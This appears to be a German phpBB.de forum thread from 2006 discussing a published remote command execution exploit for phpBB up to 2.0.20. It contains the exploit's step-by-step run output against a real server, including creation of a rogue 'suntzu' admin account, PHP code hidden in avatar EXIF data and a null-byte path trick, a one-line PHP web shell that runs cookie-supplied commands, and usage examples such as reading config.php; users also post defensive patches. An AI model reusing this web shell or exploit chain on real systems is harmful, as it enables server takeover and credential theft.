Verfasst: 14.05.2006 14:02
Ich kriege es auch nicht hin, soll aber funktionieren was ich so gehört habe.
Hoffentlich bringt die phpBB Group schnell nen Fix dafür.
![Traurig :(](./images/smilies/icon_e_sad.gif)
Hoffentlich bringt die phpBB Group schnell nen Fix dafür.
phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/
- User suntzu ist drin und hat Adminrechte...X-Powered-By: PHP/4.4.1-pl1
Content-type: text/html
PhpBB <= v2.0.20 "Admin/Restore Database/default_lang remote commands execution
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
-> you need an admin sid, works regardless of magic_quotes_gpc settings
tested and working against a fresh PhpBB installation
step 0 -> check if suntzu.php is already installed...
Step 0b -> check if exploit has already succeeded but suntzu.php deleted, try to
login as suntzu...
step 0c -> query database to create a "suntzu" user with password "suntzu"...
Done...
Step 1 -> Login as suntzu...
Cookie ->phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22
%3Bs%3A6%3A%22userid%22%3Bs%3A6%3A%22999999%22%3B%7D; phpbb2mysql_sid=25d351a87b
f1e15f451a9b8025c1d787;
sid ->25d351a87bf1e15f451a9b8025c1d787
step 2 -> enable avatar uploads, if not enabled yet...
Done...
step 3 -> upload an avatar with php code as EXIF metadata content...
step 4 -> retrieve new filename for avatar from profile page...
avatar filename -> 12134446738610cabd.jpg
step 5 -> replace default_lang value in phpbb_config table with our path to shel
l, breaking path with a null char...
Done...
step 6 -> execute code inside jpeg file
step 7 -> Launch commands...
Exploit succeeded...
Datenträger in Laufwerk D: ist Data
Volumeseriennummer: 9411-E960
Verzeichnis von D:\Inetpub\Lokal\phpbb2\Beta
14.05.2006 16:02 <DIR> .
14.05.2006 16:02 <DIR> ..
14.05.2006 15:57 <DIR> admin
14.05.2006 15:57 <DIR> cache
05.04.2006 18:53 6.660 common.php
14.05.2006 15:58 249 config.php
14.05.2006 15:57 <DIR> db
14.05.2006 15:57 <DIR> docs
05.04.2006 18:53 810 extension.inc
05.04.2006 18:53 3.643 faq.php
05.04.2006 18:53 45.807 groupcp.php
14.05.2006 15:57 <DIR> images
14.05.2006 15:57 <DIR> includes
05.04.2006 18:53 14.706 index.php
14.05.2006 15:57 <DIR> language
05.04.2006 18:53 9.492 login.php
05.04.2006 18:53 12.208 memberlist.php
05.04.2006 18:53 39.011 modcp.php
05.04.2006 18:53 34.911 posting.php
05.04.2006 18:53 73.811 privmsg.php
05.04.2006 18:53 3.428 profile.php
05.04.2006 18:53 43.661 search.php
14.05.2006 16:02 163 suntzu.php
14.05.2006 15:57 <DIR> templates
05.04.2006 18:53 23.154 viewforum.php
05.04.2006 18:53 7.233 viewonline.php
05.04.2006 18:53 45.235 viewtopic.php
14.05.2006 15:57 <DIR> _contrib
14.05.2006 15:57 <DIR> _install
17 Datei(en) 364.182 Bytes
12 Verzeichnis(se), 38.003.675.136 Bytes frei
step 8 -> restore phpbb_config with the old value to keep the board accessible
Done...
# milw0rm.com [2006-05-13]
Code: Alles auswählen
<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo 56789;passthru($_COOKIE[cmd]);echo 56789;?>
Code: Alles auswählen
if( file_exists( $phpbb_root_path . 'suntzu.php') or file_exists( $phpbb_root_path . 'admin/suntzu.php' ) )
{
die('hacking attempt');
}
Code: Alles auswählen
if (file_exists($phpbb_root_path . 'suntzu.php'))
{
die('hacking attempt');
}
Code: Alles auswählen
<?php
if( !defined('IN_PHPBB') )
{
die('Hacking attempt');
}
$sql = "SELECT s.session_id, s.session_ip FROM ".SESSIONS_TABLE." s WHERE s.session_id = '". str_replace("\'", "''", $HTTP_GET_VARS['sid']) ."' LIMIT 1";
if( !( $result = $db->sql_query($sql) ))
{
message_die(CRITICAL_ERROR, 'Hacking attempt', '', __LINE__, __FILE__, $sql);
}
$sessionrow = $db->sql_fetchrow($result);
if( $HTTP_GET_VARS['sid'] != $sessionrow['session_id'] )
{
die('Hacking attempt');
}
if( $HTTP_SERVER_VARS['REMOTE_ADDR'] != decode_ip($sessionrow['session_ip']) )
{
die('Hacking attempt');
}
unset($sessionrow);
?>
Code: Alles auswählen
PhpBB <= v2.0.20 "Admin/Restore Database/default_lang remote commands execution by rgod rgod@autistici.org site: http://retrogod.altervista.org -> you need an admin sid, works regardless of magic_quotes_gpc settings tested and working against a fresh PhpBB installation Usage: php host path sid cmd OPTIONS
host: target server (ip/hostname)
path: path to PhpBB
sid: session id
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Examples: php localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 cat config.php
php localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 ls -la -p81
php localhost / 8db5cef976c7e0f51c25c92152b56881 ls -la -P1.1.1.1:80
step 0 -> check if suntzu.php is already installed... Step 0b -> check if exploit has already succeeded but suntzu.php deleted, try to login as suntzu... Cookie -> sid -> Step 1 -> Login as suntzu... Cookie -> sid -> Unable to login...